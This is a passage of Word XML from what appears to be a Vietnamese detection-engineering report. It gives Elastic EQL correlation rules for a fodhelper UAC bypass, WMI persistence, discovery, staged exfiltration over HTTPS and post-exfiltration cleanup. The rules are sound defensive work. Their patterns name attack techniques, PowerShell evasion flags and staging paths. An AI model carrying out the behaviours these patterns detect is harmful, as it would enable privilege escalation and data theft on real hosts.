            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Correlation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="94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195875E" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="797"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076E57C" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>73</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1393"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C4E92B4" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>120s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="240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D5EAFE6" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1041 + T1070.004</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="281F6F32" w14:textId="77777777" w:rsidTr="001E275F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699"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9063623" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>S1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="159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E57913D" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VBScript Proxy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1199"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06BB7AA" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Signal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="94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F71BAD2" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="797"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918B766" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>47</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1393"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44084DE" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="240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A361710" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1059.005</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="1EFE4CB7" w14:textId="77777777" w:rsidTr="001E275F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699"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58F99559" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>S2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="159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9E35C68" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Suspicious PowerShell Flags</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1199"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25D0342" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Signal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="94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552D005" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="797"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5032FE0" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>47</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1393"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565078F8" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="240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83D9EB4" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1059.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="3512EDF8" w14:textId="77777777" w:rsidTr="001E275F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699"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CD1BC7C" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>S3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="159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53896C5" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>WMI Consumer Spawns Process</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1199"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6FCE678" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Signal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="94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F2280CE" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="797"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9B4384D" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>73</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1393"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1E0B72C" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="240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4DFB441" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1546.003</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="1B39FE0E" w14:textId="77777777" w:rsidTr="001E275F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699"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2401118" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>S4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="159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5EDCA2EE" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SYSTEM PowerShell Outbound HTTPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1199"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51635CCD" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Signal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="94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BEC043B" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="797"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586B2A84" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>99</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1393"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24AF720" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="240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0F7530E" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1041</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="380C6BEA" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00B01B4A">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F94D0AA" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>9.2 Rule C1 — UAC Bypass via Fodhelper (T1548.002)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B15EFBD" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Correlation rule 3 bước: Registry hijack ms-settings → fodhelper spawn → shell interpreter spawn, trong 30 giây. Điều kiện ms-settings là invariant của fodhelper technique — không thể tránh mà không thay đổi toàn bộ UAC bypass method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79685B84" w14:textId="5D3AA02F"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process where</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338BC134"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winlog.event_id : "1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137FB140"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and winlog.channel : "Microsoft-Windows-Sysmon/Operational"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BF910F"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and process.parent.name : "fodhelper.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A3AB25" w14:textId="642CB7C0" w:rsidR="00B01B4A" w:rsidRDefault="001E275F" w:rsidP="001E275F">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:sz="10" w:space="0" w:color="555555"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:ind w:left="240" w:right="120"/>
      </w:pPr>
      <w:r w:rsidRPr="001E275F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  and process.name in ("cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434E7E72" w14:textId="77777777" w:rsidR="00602E07" w:rsidRDefault="00602E07">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E992E4" w14:textId="44EFEC71" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>9.3 Rule C2 — WMI Persistence Full Install Chain (T1546.003)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B5169C" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Sequence bắt 3 WMI events trong 30 giây: Filter (EID 19) → Consumer (EID 20) → Binding (EID 21). EventID 21 xác nhận persistence đã LIVE. Exclude các subscription từ security tools để giảm FP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07692340"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sequence by host.name with maxspan=30s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677A0924"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[any where</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBDA170"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winlog.event_id == "19"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E72D17"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and winlog.channel == "Microsoft-Windows-Sysmon/Operational"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B9984F"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and winlog.event_data.Operation == "Created"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4614D714"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and not winlog.event_data.Name like ("*Defender*", "*elastic*", "*Malwarebytes*", "*Microsoft*")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288C05F0"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECCA2B4"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[any where</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8A970D"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winlog.event_id == "20"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED1A862"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and winlog.channel == "Microsoft-Windows-Sysmon/Operational"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C35AF90"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and winlog.event_data.Operation == "Created"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429CF9CF"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and not winlog.event_data.Name like ("*Defender*", "*elastic*", "*Malwarebytes*", "*Microsoft*")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B285384"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7518B635"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[any where</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5013057D"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winlog.event_id == "21"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C67E88"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and winlog.channel == "Microsoft-Windows-Sysmon/Operational"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF0CD05"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and winlog.event_data.Operation == "Created"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3A9769" w14:textId="7886184B" w:rsidR="00B01B4A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CF8DC2" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00B01B4A">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="197E13A3" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>9.4 Rule C3 — WMI Consumer Activated → System Discovery (T1546.003 + T1082/T1016)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C4049F" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Sequence: WmiPrvSE.exe spawn PowerShell/SYSTEM (invariant của WMI execution) → discovery binary hoặc file creation (fallback cho PowerShell cmdlets không sinh EID 1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF20846" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:sz="10" w:space="0" w:color="555555"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="80" w:line="256" w:lineRule="auto"/>
        <w:ind w:left="240" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>sequence by host.name with maxspan=30s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66344E54"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[process where winlog.event_id : "1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FADD1B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process.name : "powershell.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A544F1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process.parent.name : "WmiPrvSE.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6A58DB"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user.name : ("SYSTEM", "NT AUTHORITY\\SYSTEM")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDF91F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process.command_line : ("*-ep*bypass*","*-w*hidden*","*-noni*")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EE8FD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1F11C57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[any where user.name : ("SYSTEM", "NT AUTHORITY\\SYSTEM")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D01D5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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5602B9FF"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Discovery binary */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A63D3C"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(winlog.event_id : "1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2187F938"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process.name : ("arp.exe","ipconfig.exe","systeminfo.exe",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7870ABB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"net.exe","net1.exe","whoami.exe","nltest.exe","nbtstat.exe"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157770A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or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222A92D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File staging fallback — Cover truong hop attacker dung PS cmdlets */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5650DEFB"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(winlog.event_id : "11"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778733F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process.name : "powershell.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E0D948"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file.path : ("*\\Windows\\Temp\\*","*\\ProgramData\\*"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FC5722"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5FA75AC3" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:sz="10" w:space="0" w:color="555555"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="80" w:line="256" w:lineRule="auto"/>
        <w:ind w:left="240" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3251D983" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00B01B4A">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="350BA54B" w14:textId="77777777" w:rsidR="00602E07" w:rsidRDefault="00602E07">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="091234EF" w14:textId="3555BB9F" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>9.5 Rule C4 — File Collection → Archive → Exfiltration (T1005 + T1560.001 + T1041)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A856D19" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Ba-phase sequence trong 2 phút: file staging → ZIP creation → outbound HTTPS. FP rate gần bằng 0 vì SYSTEM + PowerShell + external HTTPS không có legitimate use case.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB71B5F" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:sz="10" w:space="0" w:color="555555"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="80" w:line="256" w:lineRule="auto"/>
        <w:ind w:left="240" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>sequence by host.name with maxspan=2m</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA1C35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[file where winlog.event_id : "11"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACF7A14"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process.name : "powershell.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048B482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file.path : ("*\\Windows\\Temp\\*","*\\Users\\Public\\*",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5CCA6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"*\\ProgramData\\*","*\\AppData\\Local\\Temp\\*")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CCB18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not file.extension in ("zip","tmp","log","etl","dll","exe")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC323D7"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user.name : ("SYSTEM", "NT AUTHORITY\\SYSTEM")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C42D7E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0B62A3B9"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[file where winlog.event_id : "11"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622FB70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process.name : "powershell.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8CE0E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file.extension : "zip"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469BFC1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file.path : ("*\\Windows\\Temp\\*","*\\Users\\Public\\*")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6921FA54"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user.name : ("SYSTEM", "NT AUTHORITY\\SYSTEM")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578D66C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66AC6FE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[network where winlog.event_id : "3"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004CDC3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process.name : "powershell.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA7E1E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destination.port in (443, 80, 8443)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0692F554"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user.name : ("SYSTEM", "NT AUTHORITY\\SYSTEM")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDA4A2B"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not cidrmatch(destination.ip,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275C255F"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"127.0.0.0/8","10.0.0.0/8","192.168.0.0/16","172.16.0.0/12")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15126782" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:sz="10" w:space="0" w:color="555555"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="80" w:line="256" w:lineRule="auto"/>
        <w:ind w:left="240" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E19B054" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00B01B4A">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A8E7902" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>9.6 Rule C5 — Exfiltration → Indicator Removal (T1041 + T1070.004)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C50A30" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Sequence: outbound HTTPS từ SYSTEM → file deletion trong staging paths trong 120 giây. Cleanup ngay sau exfil là APT behavioral signature. maxspan=120s để cover cleanup delay với cmd.exe detached.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5024795A" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:sz="10" w:space="0" w:color="555555"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="80" w:line="256" w:lineRule="auto"/>
        <w:ind w:left="240" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>sequence by host.name with maxspan=120s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22504817"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[network where winlog.event_id : "3"</w:t>
      </w:r>
